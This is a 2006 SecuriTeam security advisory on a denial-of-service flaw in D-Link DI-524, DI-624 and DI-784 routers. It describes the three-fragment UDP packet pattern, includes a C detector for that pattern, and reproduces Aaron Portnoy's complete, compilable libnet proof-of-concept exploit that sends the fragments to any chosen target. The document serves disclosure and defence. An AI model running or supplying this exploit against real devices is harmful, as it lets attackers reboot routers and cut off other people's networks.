[NEWS] D-Link Fragmented UDP Denial of Service Vulnerability
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 13 Feb 2006 19:08:14 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
D-Link Fragmented UDP Denial of Service Vulnerability
------------------------------------------------------------------------
SUMMARY
Remote exploitation of a design error flaw in multiple D-Link wireless
access points could allow attackers to create a denial of service
condition on the affected machine and therefore the wired and wireless
networks themselves.
DETAILS
Vulnerable Systems:
* D-Link DI-524 Wireless Router, firmware 3.20 August 18, 2005
* D-Link DI-624 Wireless Router
* D-Link DI-784
Immune Systems:
* D-Link DI-614+ Wireless Router
* D-Link DI-604 Ethernet Broadband Router
Successful exploitation of the described vulnerability allows remote
attackers to reboot the target router. Exploitation occurs when the
attacker sends 3 successive fragmented UDP packets with the following
specifications:
All packets must have the same Identification Number in the IP Header.
Packet 1:
The MORE_FRAGMENTS flag must be set to 1. (value IP_MF)
The fragmentation offset equal to 0.
The packet's payload size consists of 8 bytes. NULL bytes were tested in
the proof of concept.
Packet 2:
The MORE_FRAGMENTS flag set to 1. (value 0x2002)
The fragmentation offset equal to 16.
Payload is 8 bytes long.
Packet 3:
The MORE_FRAGMENTS flag set to 0. (value 0x0003)
The fragmentation offset equal to 24.
Payload is 8 bytes long.
In tests the affected routers would instantly terminate all current
connections. The DI-524 would then take approximately one minute to reboot
and restore connections; the DI-624 would take approximately 30 seconds.
This vulnerability has been confirmed to work from at most 4 hops from the
intended target. Depending on how routers, switches and other hardware
placed between the attacker and the target further fragment or reassemble
the packets, the denial of service condition may not be triggered.
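A defender-side check for the fragment pattern described above, added here as an example; it is not part of the advisory or of Aaron Portnoy's code. It parses raw IPv4 headers, groups fragments by source, destination, IP ID and protocol, and raises an alert when a datagram completes after at least one of its non-final fragments carried fewer than 16 data bytes. The threshold, the table size, the function names and the sample packets are assumptions: the first three sample fragments are constructed to mirror the train described above (one IP ID, MF with offset 0, MF with offset 16, offset 24 without MF, 8 data bytes after the first), and a fourth benign two-fragment datagram shows the check staying quiet on ordinary fragmentation.

```c
/* Added example, not the advisory's or Aaron Portnoy's code: a minimal IPv4
 * fragment-train monitor in the spirit of an IDS tiny-fragment check.
 * Fragments are grouped by (src, dst, IP ID, proto); when the final fragment
 * (MF=0) arrives, the datagram is flagged if any non-final fragment carried
 * fewer than MIN_FRAG_DATA data bytes.  Threshold, table size and sample
 * packets are assumptions made for this illustration. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MIN_FRAG_DATA 16   /* assumed: non-final fragments below this are "tiny" */
#define MAX_TRACK     16   /* assumed: datagrams tracked at once */

struct frag_state {
    int used, nfrags, tiny_nonfinal;  /* tiny_nonfinal: MF fragments with < MIN_FRAG_DATA bytes */
    uint32_t src, dst;
    uint16_t id;
    uint8_t proto;
};
static struct frag_state table[MAX_TRACK];

/* Find the slot tracking this datagram, or allocate one; NULL if the table is full. */
static struct frag_state *lookup(uint32_t src, uint32_t dst, uint16_t id, uint8_t proto)
{
    struct frag_state *slot = NULL;
    for (int i = 0; i < MAX_TRACK; i++) {
        if (table[i].used && table[i].src == src && table[i].dst == dst &&
            table[i].id == id && table[i].proto == proto)
            return &table[i];
        if (!table[i].used && !slot)
            slot = &table[i];
    }
    if (slot) {
        memset(slot, 0, sizeof *slot);
        slot->used = 1; slot->src = src; slot->dst = dst; slot->id = id; slot->proto = proto;
    }
    return slot;
}

/* Inspect one raw IPv4 packet.  Returns 1 when it completes a fragment train
 * that contained tiny non-final fragments, otherwise 0. */
int inspect_ipv4(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return 0;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    uint16_t total = (uint16_t)((pkt[2] << 8) | pkt[3]);
    if (ihl < 20 || ihl > len || total < ihl || total > len) return 0;  /* malformed */
    uint16_t id = (uint16_t)((pkt[4] << 8) | pkt[5]);
    uint16_t fword = (uint16_t)((pkt[6] << 8) | pkt[7]);
    int mf = (fword & 0x2000) != 0;                  /* More Fragments flag */
    uint32_t off = (uint32_t)(fword & 0x1fff) * 8;   /* offset field counts 8-byte units */
    uint32_t src, dst;
    memcpy(&src, pkt + 12, 4);
    memcpy(&dst, pkt + 16, 4);
    if (!mf && off == 0) return 0;                   /* unfragmented datagram */

    struct frag_state *st = lookup(src, dst, id, pkt[9]);
    if (!st) return 0;
    st->nfrags++;
    if (mf && total - ihl < MIN_FRAG_DATA) st->tiny_nonfinal++;
    if (mf) return 0;                                /* wait for the final fragment */

    int alert = st->tiny_nonfinal > 0;
    if (alert)
        printf("ALERT: IP ID %u: %d fragments, %d tiny non-final, last offset %u\n",
               (unsigned)id, st->nfrags, st->tiny_nonfinal, (unsigned)off);
    st->used = 0;                                    /* datagram complete: release slot */
    return alert;
}

/* Constructed sample packets (zero checksums, not captures).  The first three
 * mirror the advisory's train: one IP ID, MF+offset 0 carrying a UDP header and
 * 8 NULL bytes, MF+offset 16 with 8 bytes, offset 24 without MF with 8 bytes.
 * The last two form a benign datagram: 32 data bytes with MF, then 8 at offset 32. */
static const uint8_t train_frag1[36] = {
    0x45, 0, 0x00, 0x24, 0x07, 0x08, 0x20, 0x00, 128, 17, 0, 0, 192, 0, 2, 10, 192, 0, 2, 1,
    0x00, 0xc8, 0x2b, 0x67, 0x00, 0x10, 0, 0 };   /* UDP 200 -> 11111; trailing 8 bytes zero */
static const uint8_t train_frag2[28] = {
    0x45, 0, 0x00, 0x1c, 0x07, 0x08, 0x20, 0x02, 128, 17, 0, 0, 192, 0, 2, 10, 192, 0, 2, 1 };
static const uint8_t train_frag3[28] = {
    0x45, 0, 0x00, 0x1c, 0x07, 0x08, 0x00, 0x03, 128, 17, 0, 0, 192, 0, 2, 10, 192, 0, 2, 1 };
static const uint8_t benign_frag1[52] = {
    0x45, 0, 0x00, 0x34, 0x1a, 0x2b, 0x20, 0x00, 64, 17, 0, 0, 192, 0, 2, 20, 192, 0, 2, 1 };
static const uint8_t benign_frag2[28] = {
    0x45, 0, 0x00, 0x1c, 0x1a, 0x2b, 0x00, 0x04, 64, 17, 0, 0, 192, 0, 2, 20, 192, 0, 2, 1 };

int run_advisory_train(void)   /* returns 1: the train is flagged */
{
    int a = inspect_ipv4(train_frag1, sizeof train_frag1);
    a |= inspect_ipv4(train_frag2, sizeof train_frag2);
    return a | inspect_ipv4(train_frag3, sizeof train_frag3);
}

int run_benign_train(void)     /* returns 0: ordinary fragmentation stays quiet */
{
    int a = inspect_ipv4(benign_frag1, sizeof benign_frag1);
    return a | inspect_ipv4(benign_frag2, sizeof benign_frag2);
}

int main(void)
{
    printf("advisory-style train flagged: %d\n", run_advisory_train());
    printf("benign train flagged: %d\n", run_benign_train());
    return 0;
}
```

Built with gcc -Wall, the program prints one ALERT line for the constructed train and nothing for the benign datagram. The check only decides when the final fragment arrives, so a train whose last fragment is delivered first is missed; a production reassembler such as Snort's frag3 also tracks coverage gaps, overlaps and out-of-order arrival. Because intermediate hops may refragment or reassemble traffic, as the advisory notes, the monitoring point should sit as close to the protected router as possible.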
Exploit:
/*
 *
 * Aaron Portnoy
 *
 * silc.thunkers.net, thunkers
 *
 * D-Link Wireless Access Point
 * Fragmented UDP DoS Proof of Concept
 *
 *
 * gcc -o dlink_dos dlink_dos.c -lnet -Wall
 *
 */
#include <stdio.h>    /* printf, fprintf */
#include <stdlib.h>   /* exit, atoi */
#include <unistd.h>   /* getopt, optarg */
#include <libnet.h>

#define DEVICE  "eth0"
#define SRC_IP  "127.0.0.1"
#define DST_IP  "127.0.0.1"
#define SRC_PRT 200
#define DST_PRT 11111

void usage(char *name)
{
    fprintf(stderr,
            "Usage: %s [-D <device>] -s <source ip> -d <destination ip>"
            " -a <source port> -b <destination port>\n",
            name);
    exit(EXIT_FAILURE);
}

/* Build and send fragment number `count' (1..3) of the UDP datagram. */
int gen_packet(char *device, char *pSRC, char *pDST, u_short sPRT,
               u_short dPRT, int count)
{
    libnet_t *l = NULL;
    libnet_ptag_t udp = 0;
    libnet_ptag_t ip = 0;
    char errbuf[LIBNET_ERRBUF_SIZE];
    char *payload = NULL;
    u_short payload_s = 0, src_prt, dst_prt;
    u_int32_t src_ip, dst_ip;
    int c, frag = 0;

    if (!device)
        device = DEVICE;

    /* Raw IPv4 injection: the IP header built below is ours, not the kernel's. */
    l = libnet_init(LIBNET_RAW4, device, errbuf);
    if (!l) {
        fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
        exit(EXIT_FAILURE);
    }

    src_ip = libnet_name2addr4(l, pSRC ? pSRC : SRC_IP, LIBNET_RESOLVE);
    dst_ip = libnet_name2addr4(l, pDST ? pDST : DST_IP, LIBNET_RESOLVE);
    src_prt = sPRT ? sPRT : SRC_PRT;
    dst_prt = dPRT ? dPRT : DST_PRT;

    /* Only the first fragment carries the 8 NULL payload bytes; fragments
     * 2 and 3 consist of the 8-byte UDP header alone. */
    if (count == 1) {
        payload = "\0\0\0\0\0\0\0\0";
        payload_s = 8;
    }

    udp = libnet_build_udp(src_prt, dst_prt,
                           (LIBNET_UDP_H + payload_s) * 2,
                           0, (unsigned char *)payload, payload_s, l, udp);
    if (udp == -1) {
        fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
        exit(EXIT_FAILURE);
    }

    /* IP fragment word = flags | 13-bit offset in 8-byte units:
     *   packet 1: MF set, offset 0            (IP_MF = 0x2000)
     *   packet 2: MF set, offset 2 = 16 bytes (0x2002)
     *   packet 3: MF clear, offset 3 = 24 bytes (0x0003) */
    switch (count) {
    case 1:
        frag = IP_MF;
        break;
    case 2:
        frag = 0x2002;
        break;
    case 3:
        frag = 0x0003;
        break;
    default:
        frag = 0;
        break;
    }

    /* All three fragments share IP ID 1800 so they belong to one datagram. */
    ip = libnet_build_ipv4(20, 0, 1800, frag, 128, IPPROTO_UDP, 0,
                           src_ip, dst_ip, NULL, 0, l, ip);
    if (ip == -1) {
        fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
        exit(EXIT_FAILURE);
    }

    c = libnet_write(l);
    if (c == -1) {
        fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
        exit(EXIT_FAILURE);
    }
    printf("Wrote UDP packet; check the wire.\n");
    libnet_destroy(l);
    return (EXIT_SUCCESS);
}

int main(int argc, char **argv)
{
    int i;
    char *pDST, *pSRC, *device;
    u_short dPRT = 0;
    u_short sPRT = 0;

    pDST = pSRC = device = NULL;
    while ((i = getopt(argc, argv, "D:d:s:a:b:h")) != -1) {
        switch (i) {
        case 'D':
            device = optarg;
            break;
        case 'd':
            pDST = optarg;
            break;
        case 's':
            pSRC = optarg;
            break;
        case 'a':
            sPRT = atoi(optarg);
            break;
        case 'b':
            dPRT = atoi(optarg);
            break;
        case 'h':
        default:
            usage(argv[0]);
            break;
        }
    }

    printf("\n----------------------------------\n");
    printf(" -= D-Link DoS PoC =-\n");
    printf(" Aaron Portnoy\n");
    printf(" deft () thunkers ! net \n");
    printf(" silc.thunkers.net, thunkers\n");
    printf("----------------------------------\n");
    printf("\nDevice: \t%s\n", device ? device : DEVICE);
    printf("SRC IP: \t%s\n", pSRC ? pSRC : SRC_IP);
    printf("DST IP: \t%s\n", pDST ? pDST : DST_IP);
    printf("SPort: \t\t%d\n", sPRT ? sPRT : SRC_PRT);
    printf("DPort: \t\t%d\n\n", dPRT ? dPRT : DST_PRT);

    /* Send the three fragments in order; each call opens its own libnet context. */
    for (i = 1; i <= 3; i++)
        gen_packet(device, pSRC, pDST, sPRT, dPRT, i);
    printf("\n");
    return (EXIT_SUCCESS);
}
/* EoF */
ADDITIONAL INFORMATION
The information has been provided by <mailto:deft@xxxxxxxxxxxx> Aaron
Portnoy.
The original article can be found at:
<http://www.thunkers.net/~deft/advisories/dlink_udp_dos.txt>